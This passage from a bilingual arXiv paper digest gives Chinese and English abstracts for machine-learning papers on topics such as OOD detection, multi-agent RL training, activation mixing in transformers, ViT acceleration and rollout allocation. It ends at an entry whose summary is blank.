Out-of-distribution (OOD) detection has emerged as a popular technique to enhance the reliability of machine learning models by identifying unexpected inputs from unknown classes. Recent progress in pre-trained vision-language models (VLMs) has enabled zero-shot OOD detection without access to in-distribution (ID) training data; in this setting, existing methods commonly treat text embeddings of class names as class prototypes. In this paper, we challenge the widely adopted text-as-prototype paradigm by theoretically showing that off-the-shelf textual prototypes are generally misaligned with the optimal visual prototypes, yielding an intrinsic modality gap that cannot be eliminated by prompt engineering alone. To mitigate this gap under the post-hoc constraint, this paper presents an online pseudo-supervised framework that directly learns class prototypes in the visual feature space using unlabeled test-time data streams and soft predictions from the pre-trained VLMs. We provide theoretical guarantees for the convergence of the online optimization procedure. Extensive experiments empirically demonstrate that our method achieves a new state of the art across a variety of OOD detection setups.

2605.26657 2026-05-27 cs.AI 版本更新

Completion vs Optimality: Policy Gradient in Long-Horizon Cumulative-Damage Problems

完成度与最优性:长时域累积损伤问题中的策略梯度

Wolfgang Maass, Sabine Janzen

发表机构 * Saarland University(萨尔兰大学) German Research Center for Artificial Intelligence (DFKI)(德国人工智能研究中心(DFKI))

AI总结 本文针对长时域累积损伤问题,识别策略梯度方法的两种正交失败模式(完成度和最优性),提出分解方法,并通过两个校准环境验证了四个可检验预测。

详情
AI中文摘要

具有累积损伤的长时域决策问题将局部吸引动作与全局不利结果耦合。我们识别了此类问题上策略梯度方法的两种正交失败模式,并提出一种将其分离的分解:\emph{完成度}(达到终端时域而非通过隐式终端约束退出)和\emph{最优性}(在给定完成度的情况下匹配动态规划参考)。在带有线性软惩罚的PPO下,仅授予时域访问会降低完成率:惩罚的均衡将主导活动份额推向零,而动作空间限制结合时域访问实现了完成度,但留下了最优性差距($ΔM_{\text{final}} = 0.271$),我们将其追溯到损伤起源处的第一阶段贪婪承诺。我们推导了四个可检验预测,并在两个独立校准环境中进行评估,这两个环境共享相同的抽象结构,但在领域、时域、活动集和校准数据上不同:一个49步的砖瓦工职业生涯和一个20赛季的NBA大前锋职业生涯。所有四个预测均定性复现。时域不变性预测在四个测试时域中的三个得到满足,例外出现在$H = 15$,与$H^*$边界一致(在NBA参数下$H^* \in [6, 14]$)。

英文摘要

Long-horizon decision problems with cumulative damage couple locally attractive actions to globally adverse outcomes. We identify two orthogonal failure modes for policy-gradient methods on this class and propose a decomposition that separates them: \emph{completion} (reaching the terminal horizon rather than exiting via an implicit terminal constraint) and \emph{optimality} (matching the dynamic-programming reference given completion). Under PPO with a linear soft penalty, granting horizon access alone reduces the completion rate: the penalty's equilibrium drives the dominant-activity share to zero, while action-space restriction combined with horizon access achieves completion but leaves an optimality gap ($ΔM_{\text{final}} = 0.271$) that we trace to first-phase greedy commitment at the damage origin. We derive four testable predictions and evaluate them in two separately calibrated environments that share the same abstract structure but differ in domain, horizon, activity set, and calibration data: a 49-step bricklayer career and a 20-season NBA power-forward career. All four predictions replicate qualitatively. The horizon-invariance prediction is met at three of four tested horizons, with the exception at $H = 15$ consistent with the $H^*$ boundary ($H^* \in [6, 14]$ under the NBA parameters).

2605.26654 2026-05-27 cs.LG cs.AI math.OC stat.ML 版本更新

Bilevel Optimization over Saddle Points of Zero-Sum Markov Games

零和马尔可夫博弈鞍点上的双层优化

Zihao Zheng, Irwin King, Songtao Lu

发表机构 * Shun Hing Institute of Advanced Engineering, The Chinese University of Hong Kong(香港中文大学先进工程学院) Department of Computer Science and Engineering, The Chinese University of Hong Kong(香港中文大学计算机科学与工程系)

AI总结 针对下层为零和马尔可夫博弈的双层优化问题,提出基于惩罚的Nikaido-Isoda下降-上升方法(PANDA),避免计算超梯度且无需二阶信息,在无凸性假设下收敛到平稳点,达到与单策略下层MDP双层RL相当的最优速率。

Comments Accepted to the International Conference on Machine Learning (ICML 2026)

详情
AI中文摘要

强化学习(RL)通常具有层次结构,其中上层(UL)学习器选择模型参数,下层(LL)决策过程做出响应,自然形成双层优化问题。大多数现有的双层RL方法假设下层为单策略马尔可夫决策过程(MDP),因此无法捕捉激励设计等应用中出现的竞争结构,其中多个策略相互交互。我们研究了下层问题为正则化极小极大零和马尔可夫博弈、上层目标通过下层博弈诱导的鞍点均衡进行优化的双层优化问题。在这项工作中,我们提出了惩罚增强的Nikaido-Isoda下降-上升(PANDA),一种基于Nikaido-Isoda函数的惩罚一阶策略梯度方法。通过利用极小极大博弈结构,PANDA避免了计算上层超梯度,且不需要二阶信息。我们证明了PANDA在无需对上层或下层目标做凸性假设的情况下收敛到平稳点。此外,PANDA在$\tilde{\mathcal{O}}(ε^{-1})$次迭代内达到$ε$-平稳点,样本复杂度为$\tilde{\mathcal{O}}(ε^{-3})$,与单策略下层MDP的双层RL的最佳已知速率相匹配。实验表明PANDA优于密切相关基线方法。

英文摘要

Reinforcement learning (RL) often has a hierarchical structure, where an upper-level (UL) learner selects model parameters and a lower-level (LL) decision-making process responds, naturally leading to a bilevel optimization problem. Most existing bilevel RL methods assume a single-policy LL Markov decision process (MDP), and therefore fail to capture competitive structures arising in applications such as incentive design, where multiple policies interact. We study bilevel optimization problems in which the LL problem is a regularized min-max zero-sum Markov game and the UL objective is optimized through the saddle-point equilibrium induced by the LL game. In this work, we propose penalty-augmented Nikaido-Isoda descent-ascent (PANDA), a penalty-based first-order policy-gradient method based on the Nikaido-Isoda function. By exploiting the min-max game structure, PANDA avoids computing UL hypergradients and does not require second-order information. We prove that PANDA converges to stationary points without convexity assumptions on either the UL or LL objectives. Moreover, PANDA reaches an $ε$-stationary point in $\tilde{\mathcal{O}}(ε^{-1})$ iterations with sample complexity $\tilde{\mathcal{O}}(ε^{-3})$, matching the best-known rates for bilevel RL with single-policy LL MDPs. Experiments demonstrate the superior performance of PANDA over closely related baselines.
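
For readers unfamiliar with the Nikaido-Isoda function, its standard form for a two-player zero-sum game is given below. The notation ($f_\theta$, $x$, $y$, $F$, $\lambda$) is assumed for illustration and is not taken from the paper, and the penalized objective in the second display is only a schematic of how such a function can replace the lower-level saddle-point constraint, not necessarily PANDA's exact formulation.

```latex
% Zero-sum game: x minimizes and y maximizes the payoff f_\theta(x, y).
\[
  \Psi_\theta(x, y)
  \;=\; \max_{y'} f_\theta(x, y') \;-\; \min_{x'} f_\theta(x', y)
  \;\ge\; 0,
  \qquad
  \Psi_\theta(x, y) = 0 \iff (x, y) \text{ is a saddle point of } f_\theta .
\]

% Schematic penalty reformulation (assumed form, penalty weight \lambda > 0):
\[
  \min_{\theta,\, x,\, y} \; F(\theta, x, y) \;+\; \lambda\, \Psi_\theta(x, y).
\]
```

Nonnegativity follows from $\max_{y'} f_\theta(x, y') \ge f_\theta(x, y) \ge \min_{x'} f_\theta(x', y)$, so driving $\Psi_\theta$ to zero enforces the equilibrium condition using only first-order information about $f_\theta$.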

2605.26647 2026-05-27 cs.LG cs.AI stat.ML 版本更新

More Expressive Feedforward Layers: Part I. Token-Adaptive Mixing of Activations

更具表达力的前馈层:第一部分。激活的令牌自适应混合

Mingze Wang, Jinbo Wang, Yikuan Xia, Kai Shen, Shu Zhong

发表机构 * Peking University(北京大学)

AI总结 提出令牌自适应激活混合(MoA)和可学习激活(LA)方法,通过轻量级输入相关门混合多个激活函数,在理论和实验上证明其比固定激活FFN具有更强的表达能力和更优的缩放行为。

Comments 31 pages

详情
AI中文摘要

前馈网络(FFN)层在基于Transformer的大语言模型(LLMs)中占据了大部分参数和非线性表达能力。尽管从ReLU和GELU发展到门控变体如SwiGLU,大多数FFN设计仍使用单一固定激活函数,对所有令牌应用相同的非线性变换。在这项工作中,我们提出了激活混合(MoA),一种令牌自适应的FFN设计,它使用轻量级输入相关门混合一个激活函数字典,同时共享相同的线性投影。作为输入无关的对应,我们还引入了可学习激活(LA),它为ReLU型和SwiGLU型FFN形成激活函数的线性组合。理论上,我们在固定激活FFN、LA和MoA之间建立了严格的有限宽度表达分离:LA严格包含固定激活FFN,而MoA严格包含LA,额外的表达能力来自于输入相关的非线性混合。实验上,我们通过在不同令牌预算、优化器和学习率调度下,对0.12B到2B参数的密集和MoE语言模型进行广泛的预训练实验来评估MoA。与调整良好的基线相比,MoA始终获得更低的最终损失,并表现出更有利的缩放行为,且参数和计算开销极小。这些结果表明,令牌自适应激活混合是提高LLMs中FFN表达能力的一种简单而有效的机制。

英文摘要

Feedforward network (FFN) layers account for a large fraction of parameters and nonlinear expressivity in Transformer-based large language models (LLMs). Despite the evolution from ReLU and GELU to gated variants such as SwiGLU, most FFN designs still use a single fixed activation function, applying the same nonlinear transformation to all tokens. In this work, we propose Mixture of Activations (MoA), a token-adaptive FFN design that mixes a dictionary of activation functions using lightweight input-dependent gates while sharing the same linear projections. As an input-independent counterpart, we also introduce learnable activations (LA), which form linear combinations of activation functions for both ReLU-type and SwiGLU-type FFNs. Theoretically, we establish strict finite-width expressive separations among fixed-activation FFNs, LA, and MoA: LA strictly contains fixed-activation FFNs, while MoA strictly contains LA, with the additional expressivity arising from input-dependent nonlinear hybridization. Empirically, we evaluate MoA through extensive pre-training experiments on dense and MoE language models ranging from 0.12B to 2B parameters under different token budgets, optimizers, and learning rate schedules. MoA consistently achieves lower terminal loss and exhibits more favorable scaling behavior than well-tuned baselines, with minimal parameter and computational overhead. These results suggest that token-adaptive activation mixing is a simple and effective mechanism for improving FFN expressivity in LLMs.
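
A token-adaptive mixture of activations can be sketched for a single token as follows. This is a minimal illustration under stated assumptions, not the paper's architecture: the softmax gate, the particular dictionary (ReLU, GELU, SiLU), and all names such as `moa_ffn` and `W_gate` are hypothetical choices made for the example.

```python
import math


def relu(z):
    return max(0.0, z)


def gelu(z):
    return 0.5 * z * (1.0 + math.erf(z / math.sqrt(2.0)))


def silu(z):
    return z / (1.0 + math.exp(-z))


# Assumed activation dictionary; the paper's dictionary may differ.
ACTIVATIONS = [relu, gelu, silu]


def matvec(W, x):
    """Multiply a matrix (list of rows) by a vector."""
    return [sum(w * xi for w, xi in zip(row, x)) for row in W]


def softmax(logits):
    m = max(logits)
    exps = [math.exp(v - m) for v in logits]
    total = sum(exps)
    return [e / total for e in exps]


def moa_ffn(x, W_in, W_out, W_gate):
    """FFN whose nonlinearity is a per-token mixture of activations.

    W_in and W_out are shared by all activations; W_gate maps the token
    to one mixing weight per activation (assumed softmax gating).
    """
    hidden = matvec(W_in, x)
    gates = softmax(matvec(W_gate, x))
    mixed = [sum(g * act(h) for g, act in zip(gates, ACTIVATIONS)) for h in hidden]
    return matvec(W_out, mixed)


x = [1.0, -2.0]
W_in = [[1.0, 0.0], [0.0, 1.0], [1.0, 1.0]]
W_out = [[1.0, 1.0, 1.0]]
W_gate = [[2.0, 0.0], [0.0, 1.0], [0.0, 0.0]]
print(moa_ffn(x, W_in, W_out, W_gate))
```

Setting `W_gate` to zeros makes the gate uniform and independent of the input, which in this sketch corresponds to a fixed linear combination of activations, the input-independent case the abstract calls learnable activations.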

2605.26646 2026-05-27 cs.AI cs.CL cs.MA 版本更新

UnityMAS-O: A General RL Optimization Framework for LLM-Based Multi-Agent Systems

UnityMAS-O: 基于LLM的多智能体系统的通用强化学习优化框架

Yiqun Chen, Wei Yang, Erhan Zhang, Shijie Wang, Qi Liu, Zechun Niu, Bin Zhang, Haitao Li, Rui Li, Lingyong Yan, Jinyuan Feng, Biqing Qi, Xiaochi Wei, Yan Gao, Yi Wu, Yao Hu, Jiaxin Mao

发表机构 * Renmin University of China(中国人民大学) Xiaohongshu Inc.(小红书公司)

AI总结 提出UnityMAS-O框架,将多智能体工作流作为优化单元,通过逻辑角色、图轨迹、用户定义奖励和智能体-模型映射四个核心对象解耦逻辑与物理参数,支持灵活的参数共享和奖励分配,在检索增强问答、迭代搜索和反思代码生成任务上验证了多智能体RL对手动工作流的提升效果。

详情
AI中文摘要

基于LLM的多智能体系统将复杂任务分解为交互角色,但大多数仍通过提示、工具和控制规则手动编排,智能体很少通过统一的强化学习接口进行优化。现有的RL后训练框架主要针对单策略优化,缺乏对用户定义的多智能体工作流、结构化交互、角色特定信用分配和可配置参数共享的抽象。我们提出了UnityMAS-O,一个用于基于LLM的多智能体系统的通用RL优化框架。UnityMAS-O将完整工作流视为优化单元,而非单个响应或策略轨迹。它通过四个核心对象表示工作流:逻辑智能体角色、图轨迹、用户定义奖励和智能体-模型映射。这将逻辑智能体与物理模型参数解耦,支持完全共享、完全分离和部分共享,奖励在角色、轮次和轨迹级别分配。UnityMAS-O通过基于Ray的星形拓扑运行时扩展了verl。中央控制器执行工作流、调用工具、记录结构化轨迹并组装奖励;模型本地工作器组负责轨迹生成、缓冲、优势计算和分布式PPO风格更新。用户可以定义智能体、工作流、模型映射和奖励,而无需重写优化基础设施。我们在检索增强问答、迭代智能体搜索和反思代码生成上实例化了UnityMAS-O。在Natural Questions、HotpotQA和保留代码任务上,多智能体RL在优化后改进了手动指定的工作流,对于较小模型和严格代码全通过指标尤其有较大提升。这些结果表明,UnityMAS-O可以作为可复用基础,将多样化的基于LLM的多智能体工作流转化为可训练的多智能体RL系统。

英文摘要

LLM-based multi-agent systems decompose complex tasks into interacting roles, but most remain manually orchestrated by prompts, tools, and control rules, while agents are rarely optimized through a unified reinforcement learning interface. Existing RL post-training frameworks mainly target single-policy optimization and lack abstractions for user-defined multi-agent workflows, structured interaction, role-specific credit assignment, and configurable parameter sharing. We present UnityMAS-O, a general RL optimization framework for LLM-based multi-agent systems. UnityMAS-O treats the complete workflow as the optimization unit, rather than a single response or policy trajectory. It represents workflows through four first-class objects: logical agent roles, graph trajectories, user-defined rewards, and agent--model mappings. This decouples logical agents from physical model parameters, supporting full sharing, full separation, and partial sharing, with rewards assigned at role, turn, and trajectory levels. UnityMAS-O extends verl with a Ray-based star-topology runtime. A central controller executes workflows, invokes tools, records structured trajectories, and assembles rewards; model-local worker groups handle rollout, buffering, advantage computation, and distributed PPO-style updates. Users can define agents, workflows, model mappings, and rewards without rewriting the optimization infrastructure. We instantiate UnityMAS-O on retrieval-augmented QA, iterative agentic search, and reflective code generation. Across Natural Questions, HotpotQA, and held-out code tasks, multi-agent RL improves manually specified workflows after optimization, with especially large gains for smaller models and strict code all-passed metrics. These results show that UnityMAS-O can serve as a reusable substrate for converting diverse LLM-based multi-agent workflows into trainable multi-agent RL systems.

2605.26636 2026-05-27 cs.CV cs.AI 版本更新

JetViT: Efficient High-Resolution Vision Transformer with Post-Training Attention Search

JetViT: 高效高分辨率视觉Transformer与训练后注意力搜索

Dongyun Zou, Zhuoyang Zhang, Junyu Chen, Wenkun He, Qinhe Peng, Hanrong Ye, Yao Lu, Hongxu Yin, Yu Wang, Song Han, Han Cai

发表机构 * MIT(麻省理工学院) University of Pennsylvania(宾夕法尼亚大学) NVIDIA(NVIDIA公司) Physical Intelligence(物理智能)

AI总结 提出JetViT混合架构视觉Transformer,通过训练后注意力搜索将预训练全注意力ViT转换为高效混合注意力变体,在高分辨率图像上实现更高推理效率且不损失精度。

Comments Accepted to CVPR 2026 Findings

详情
AI中文摘要

我们介绍了JetViT,一种新颖的混合架构视觉Transformer(ViT)模型系列,它在匹配最先进的全注意力视觉基础模型精度的同时,在高分辨率图像上实现了显著更高的推理效率。我们方法的核心是训练后注意力搜索,这是一种训练后加速框架,通过识别并将冗余的全注意力块替换为线性注意力或窗口注意力块,将预训练的全注意力ViT转换为高效的混合注意力变体。通过继承基础模型的MLP和注意力权重,训练后注意力搜索通过三个关键步骤高效探索架构设计空间:(1)优化线性注意力块设计;(2)找到线性注意力块和窗口注意力块的最佳组合;(3)识别并保留关键的全注意力块。我们在两个代表性的高分辨率视觉基础模型DINOv3和DepthAnythingV2上评估了JetViT。在NVIDIA H100 GPU上,JetViT在不牺牲精度的情况下实现了高达1.79倍的吞吐量提升和高达44.81%的延迟降低。我们将很快发布我们的代码和加速后的ViT模型。

英文摘要

We introduce JetViT, a novel family of hybrid-architecture Vision Transformer (ViT) models that match the accuracy of state-of-the-art full-attention vision foundation models while achieving substantially higher inference efficiency on high-resolution images. At the core of our approach is Post-Training Attention Search, a post-training acceleration framework that converts pre-trained full-attention ViTs into efficient hybrid-attention variants by identifying and replacing redundant full-attention blocks with linear or window-attention blocks. By inheriting the MLP and attention weights from the base model, Post-Training Attention Search efficiently explores the architectural design space through three key steps: (1) optimizing the linear-attention block design; (2) finding the best combination of linear-attention and window-attention blocks; and (3) identifying and preserving critical full-attention blocks. We evaluate JetViT on two representative high-resolution vision foundation models, DINOv3 and DepthAnythingV2. On the NVIDIA H100 GPU, JetViT achieves up to 1.79x higher throughput and up to 44.81% lower latency without sacrificing accuracy. We will release our code and accelerated ViT models soon.

2605.26628 2026-05-27 cs.AI 版本更新

Tail-Aware HiFloat4: W4A4 Post-Training Quantization for Wan2.2

Tail-Aware HiFloat4: 面向Wan2.2的W4A4训练后量化

Zhanfeng Feng, Shuai Guo, Xin Di, Long Peng, Yang Cao, Zhengjun Zha

发表机构 * University of Science and Technology of China(中国科学技术大学)

AI总结 提出Tail-Aware HiFloat4方法,通过感知激活尾部的百分位校准和紧凑PTQ状态恢复,在HiFloat4数值格式下对Wan2.2进行W4A4训练后量化,减少罕见校准异常值的影响。

详情
AI中文摘要

本报告描述了Tail-Aware HiFloat4,这是我们提交给低位文本到视频生成量化挑战的方法。我们的方法将公开的ViDiT-Q训练后量化流水线适配到Wan2.2,并采用HiFloat4数值格式。我们对Wan2.2两个Transformer模块中的主要线性层进行W4A4 HiFloat4伪量化,将数值敏感的边界模块保持高精度,并引入一个感知激活尾部的百分位校准模块用于通道掩码构建。结合紧凑的PTQ状态恢复,该设计减少了罕见校准异常值的影响,同时保持运行时HiFloat4算术和采样流水线不变。

英文摘要

This report describes Tail-Aware HiFloat4, our submission to the low-bit text-to-video generation quantization challenge. Our method adapts the public ViDiT-Q post-training quantization pipeline to Wan2.2 under the HiFloat4 numerical format. We quantize the main linear layers in both Wan2.2 transformer modules with W4A4 HiFloat4 fake quantization, keep numerically sensitive boundary modules in high precision, and introduce an activation-tail-aware percentile calibration module for channel-mask construction. Together with compact PTQ-state restoration, this design reduces the influence of rare calibration outliers while keeping the runtime HiFloat4 arithmetic and sampling pipeline unchanged.

2605.26621 2026-05-27 cs.CV cs.AI 版本更新

MedVol-R1: Reward-Driven Evidence Grounding for Volumetric Reasoning Segmentation

MedVol-R1:基于奖励驱动的证据基础用于体积推理分割

Zichun Wang, Hairong Shi, Bingzheng Wei, Yan Xu, Zihua Wang

发表机构 * School of Biological Science and Medical Engineering, Beihang University, Beijing, China(生物科学与医学工程学院,北京航空航天大学) Center for Information and Computer Science, School of Science for Open and Environmental Systems, Graduate School of Science and Technology, Keio University, Kanagawa, Japan(信息与计算机科学中心,开放与环境系统科学学院,理工学研究生院,庆应义塾大学,神奈川,日本) Bytedance Inc., China(字节跳动公司,中国) Tsinghua University, Beijing, China(清华大学,北京,中国)

AI总结 提出MedVol-R1框架,通过强化学习将临床推理解耦为可验证的2D证据锚点,再传播为3D掩膜,实现体积推理分割,在多个基准上达到最优性能。

详情
AI中文摘要

体积推理分割(VRS)旨在根据自由形式的临床查询在3D医学扫描中分割目标区域,其中所指对象通常是隐含的,需要医学知识和体积基础推理。现有方法通常依赖专门的分割标记将语言与掩膜解码连接起来,但这种耦合将决策过程压缩为不透明的潜在表示,限制了可解释性和对多样化叙述表达的泛化能力。在本文中,我们提出MedVol-R1,一种基于强化学习的VRS框架,明确地将证据基础与体积描绘解耦:LVLM将临床推理定位到可验证的2D证据锚点(关键轴向切片和2D边界框),然后由冻结的MedSAM2模块将其传播为连贯的3D掩膜。我们使用冷启动监督微调后接GRPO来训练MedVol-R1,并由多组件奖励引导,该奖励鼓励信息性证据选择、准确的2D空间定位和跨切片体积连贯性,无需昂贵的思维链注释。在M3D-Seg基准的CT-ORG、AbdomenCT-1K和KiTS23上的实验表明,MedVol-R1一致优于强基线并达到最先进性能,强化学习相比纯监督微调提供了明显增益。

英文摘要

Volumetric Reasoning Segmentation (VRS) aims to segment a target region in a 3D medical scan from a free-form clinical query, where the referent is often implicit and requires both medical knowledge and volume-grounded reasoning. Existing methods typically rely on specialized segmentation tokens to connect language with mask decoding, but this coupling collapses the decision process into opaque latent representations, limiting interpretability and generalization to diverse narrative expressions. In this paper, we present MedVol-R1, a reinforcement learning-based framework for VRS that explicitly decouples evidence grounding from volumetric delineation: the LVLM grounds clinical reasoning to a verifiable 2D evidence anchor (key axial slice and 2D bounding boxes), which is then propagated into a coherent 3D mask by a frozen MedSAM2 module. We train MedVol-R1 with cold-start supervised fine-tuning followed by GRPO, guided by a multi-component reward that encourages informative evidence selection, accurate 2D spatial grounding, and cross-slice volumetric coherence, without requiring costly chain-of-thought annotations. Experiments on CT-ORG, AbdomenCT-1K, and KiTS23 from the M3D-Seg benchmark demonstrate that MedVol-R1 consistently outperforms strong baselines and achieves state-of-the-art performance, with reinforcement learning providing clear gains over pure supervised fine-tuning.

2605.26615 2026-05-27 cs.AI 版本更新

FAST-GOAL: Fast and Efficient Global-local Object Alignment Learning

FAST-GOAL: 快速高效的全局-局部对象对齐学习

Hyungyu Choi, Young Kyun Jang, Chanho Eom

发表机构 * Department of Virtual Convergence, Graduate School of Advanced Imaging Science, Multimedia & Films (GSAIM), Chung-Ang University(虚拟融合系,先进影像科学、多媒体与电影研究生院(GSAIM),中央大学)

AI总结 提出FAST-GOAL微调方法,通过全局-局部语义对齐增强CLIP处理长文本的能力,包括快速局部图像-句子匹配和基于token相似性的学习,并在GLIT100k数据集上训练,在长/短描述数据集上均取得显著提升。

Comments 21 pages, 8 figures, IEEE/TIP 2026 accepted

详情
AI中文摘要

视觉-语言模型如CLIP在图像和文本对齐方面表现出色,但由于在简短标题上预训练,它们通常难以处理冗长详细的文本描述。我们提出FAST-GOAL(快速高效的全局-局部对象对齐学习),一种高效的微调方法,通过全局-局部语义对齐增强CLIP处理长文本的能力。我们的方法包含两个关键组件。首先,快速局部图像-句子匹配(FLISM)通过目标检测和空间划分高效提取局部图像区域,然后将其与对应句子匹配。其次,基于token相似性的学习(TSL)最大化图像中特定区域的patch token与其对应区域嵌入之间的相似性,并将相同原理应用于文本,从而增强模型捕获细节对应关系的能力。此外,我们引入了GLIT100k数据集,该数据集提供全局图像-长描述对和上下文派生的局部对,其中局部描述从全局描述中提取以保持语义连贯性。通过在长描述数据集(DOCCI, DCI)和短描述数据集(MSCOCO, Flickr30k)上的大量实验,我们证明FAST-GOAL相比基线取得了显著改进,使CLIP能够有效适应详细文本描述,同时保持计算效率。

英文摘要

Vision-language models such as CLIP have shown impressive capabilities in aligning images and text, but they often struggle with lengthy and detailed text descriptions due to pre-training on short and concise captions. We present FAST-GOAL (Fast and Efficient Global-local Object Alignment Learning), an efficient fine-tuning method that enhances the ability of CLIP to handle lengthy text through global-local semantic alignment. Our method consists of two key components. First, Fast Local Image-Sentence Matching (FLISM) efficiently extracts local image regions through object detection and spatial division, then matches them with corresponding sentences. Second, Token Similarity-based Learning (TSL) maximizes the similarity between patch tokens from specific regions in the image and their corresponding region embeddings, applying the same principle to text, which enhances the ability of the model to capture detailed correspondences. Additionally, we introduce GLIT100k, a dataset that provides both global pairs of images and lengthy captions and context-derived local pairs, where local descriptions are extracted from global captions to maintain semantic coherence. Through extensive experiments on long caption datasets (DOCCI, DCI) and short caption datasets (MSCOCO, Flickr30k), we demonstrate that FAST-GOAL achieves significant improvements over baselines, enabling effective adaptation of CLIP to detailed textual descriptions while maintaining computational efficiency.

2605.26606 2026-05-27 cs.LG cs.AI 版本更新

Spend Your Rollouts Where It Counts: Rollout Allocation for Group-Based RL Post-Training

将你的展开用在关键处:基于组强化学习后训练的展开分配

Woojeong Kim, Ziyi Yang, Jing Nathan Yan, Jialu Liu

发表机构 * Cornell University(康奈尔大学)

AI总结 提出 Pilot-Commit 框架,通过预算感知的展开分配策略,优先将计算资源分配给高信息量的提示,从而在组策略优化中减少采样成本并加速收敛。

详情
AI中文摘要

强化学习(RL)是后训练大型语言模型的主要范式。然而,在在线、在策略设置中,展开生成主导了训练的计算成本。基于组的策略优化方法对每个提示计算多个展开的优势,但它们不加区分地将预算分配给奖励分布崩溃的提示,将昂贵的展开浪费在可忽略的学习信号上。我们证明,基于组的更新在高奖励方差区域最为有效。由于策略在整个训练过程中演变,提示的信息量必须在线估计而非预先计算,但穷举评估每个提示在计算上不可行。我们引入了 Pilot-Commit,一个用于基于组 RL 后训练的预算感知展开分配框架。Pilot-Commit 将提示评估与利用解耦:一个试点阶段使用预算的一部分估计每个提示的信息量,然后将剩余的展开分配给高杠杆提示,同时跳过低信号提示。在多个数学推理基准和从 1.5B 到 14B 参数的模型规模上,Pilot-Commit 以显著更低的采样成本匹配基线准确率,在累积展开中达到目标准确率的速度比 GRPO 快高达 $1.9\times$,比 DAPO 快高达 $4.0\times$。

英文摘要

Reinforcement learning (RL) is the dominant paradigm for post-training large language models. However, in the online, on-policy setting, rollout generation dominates the computational cost of training. Group-based policy optimization methods compute advantages from multiple rollouts per prompt, yet they indiscriminately allocate budget to prompts with collapsed reward distributions, wasting expensive rollouts on negligible learning signals. We demonstrate that group-based updates are most effective in regimes of high reward variance. Since the policy evolves throughout training, prompt informativeness must be estimated online rather than precomputed, but exhaustively evaluating every prompt is computationally prohibitive. We introduce Pilot-Commit, a budget-aware rollout allocation framework for group-based RL post-training. Pilot-Commit decouples prompt evaluation from exploitation: a pilot stage estimates per-prompt informativeness using a fraction of the budget, and the remaining rollouts are allocated to high-leverage prompts while low-signal prompts are skipped. Across multiple math reasoning benchmarks and model scales from 1.5B to 14B parameters, Pilot-Commit matches baseline accuracy with significantly lower sampling costs, reaching target accuracy up to $1.9\times$ faster than GRPO and $4.0\times$ faster than DAPO in cumulative rollouts.
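
A minimal sketch of the pilot-then-commit idea follows. It assumes reward variance as the informativeness signal (the abstract states that group-based updates work best under high reward variance) and splits the remaining budget in proportion to that variance. The function name, the proportional rule, and the threshold are assumptions made for illustration; the abstract does not specify the paper's actual allocation rule.

```python
from statistics import pvariance


def pilot_commit_allocation(pilot_rewards, total_budget, min_variance=1e-8):
    """Allocate the rollouts left after the pilot stage.

    pilot_rewards: dict mapping prompt id -> list of pilot-rollout rewards.
    Returns a dict mapping prompt id -> number of additional rollouts.
    """
    spent = sum(len(r) for r in pilot_rewards.values())
    remaining = max(total_budget - spent, 0)
    variances = {p: pvariance(r) for p, r in pilot_rewards.items()}

    # Prompts whose pilot rewards are all equal carry no group-relative signal.
    informative = [p for p, v in variances.items() if v > min_variance]
    allocation = {p: 0 for p in pilot_rewards}
    if not informative or remaining == 0:
        return allocation

    total_var = sum(variances[p] for p in informative)
    for p in informative:
        allocation[p] = int(remaining * variances[p] / total_var)

    # Hand rollouts lost to rounding to the highest-variance prompts.
    leftover = remaining - sum(allocation.values())
    by_variance = sorted(informative, key=lambda q: variances[q], reverse=True)
    for p in by_variance[:leftover]:
        allocation[p] += 1
    return allocation


pilot = {"easy": [1, 1, 1, 1], "mixed": [0, 1, 0, 1], "hard": [0, 0, 0, 0]}
print(pilot_commit_allocation(pilot, total_budget=20))
```

In this toy run the always-solved and never-solved prompts receive no further rollouts, which is the "skip low-signal prompts" behaviour the abstract describes.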

2605.26600 2026-05-27 cs.LG cs.AI 版本更新

Geometry-Aware Contrastive Learning for Few-Shot Automatic Modulation Recognition

几何感知对比学习用于少样本自动调制识别

Guanqun Zhao, Yitong Liu, Jiaxuan Fang, Yufei Mao, Hongwen Yang

发表机构 * Beijing University of Posts and Telecommunications(北京邮电大学)

AI总结 提出动态一致性对比学习框架,通过虚拟对抗增强和语义一致性损失解决自监督学习中的各向同性增强、频谱不稳定和语义漂移问题,在少样本设置下提升自动调制识别准确率。

详情
AI中文摘要

标准的自动调制识别自监督学习面临无效的各向同性增强、频谱不稳定性和语义漂移等挑战。为解决这些问题,我们提出了动态一致性对比学习,一种几何感知框架,将虚拟对抗增强与语义一致性损失相结合。我们提供的理论分析表明,该策略作为编码器的隐式频谱正则化器,能够实现稳定的流形探索。此外,我们的信号自适应Swin骨干网络采用固定窗口注意力,通过限制注意力局部性提高了结构稳定性,而混合知识融合模块则利用物理先验锚定表示。在RML基准上的实验表明,DyCo-CL在1-shot设置下相比先前方法获得了6.27%的准确率提升。

英文摘要

Standard Self-Supervised Learning (SSL) for Automatic Modulation Recognition (AMR) struggles with ineffective isotropic augmentations, spectral instability, and semantic drift. To address these challenges, we propose Dynamic-Consistency Contrastive Learning (DyCo-CL), a geometry-aware framework that couples Virtual Adversarial Augmentation (VAA) with a semantic consistency loss. We provide a theoretical analysis indicating that this strategy acts as an implicit spectral regularizer for the encoder, enabling stable manifold exploration. Complementing this, our Signal-Adaptive Swin Backbone with fixed-window attention improves structural stability by constraining attention locality, while a Hybrid Knowledge Fusion module anchors representations with physical priors. Experiments on RML benchmarks show that DyCo-CL achieves a 6.27% accuracy gain in 1-shot settings over prior methods.

2605.26596 2026-05-27 cs.AI 版本更新

AGORA: Adapter-Grounded Observation-Action Retention for Inference-Free Prompt Compression in LLM Agents

AGORA: 基于适配器接地观察-动作保留的LLM智能体无推理提示压缩

Haoran Zhang, Zhaohua Sun

发表机构 * AI Agent Technologies (Hong Kong) Limited(人工智能代理技术(香港)有限公司) Department of Mechanical Engineering, The University of Hong Kong(香港大学机械工程系)

AI总结 针对LLM智能体,提出AGORA无推理步骤级压缩器,通过结构提示解析器、格式关键内容保留和125M参数相关性评分器,在9个测试单元中8个保持≥75%的无压缩性能。

Comments 10 pages, 2 figures. Code and data: https://github.com/ranranrannervous/agoracompression

详情
AI中文摘要

